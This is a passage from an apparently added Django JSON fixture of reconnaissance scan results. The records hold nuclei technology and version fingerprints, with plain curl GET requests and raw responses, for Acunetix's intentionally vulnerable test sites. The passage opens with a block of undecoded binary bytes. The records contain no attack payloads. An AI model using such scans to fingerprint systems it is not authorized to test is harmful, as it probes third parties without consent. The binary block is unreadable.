�5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 272, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:34:59.043Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 273, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:34:59.138Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 274, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:34:59.230Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 275, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:34:59.317Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 276, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:34:59.400Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 277, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:34:59.486Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 278, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:34:59.580Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 279, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:34:59.685Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 280, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:34:59.772Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 281, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:34:59.853Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:56 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 282, + "fields": { 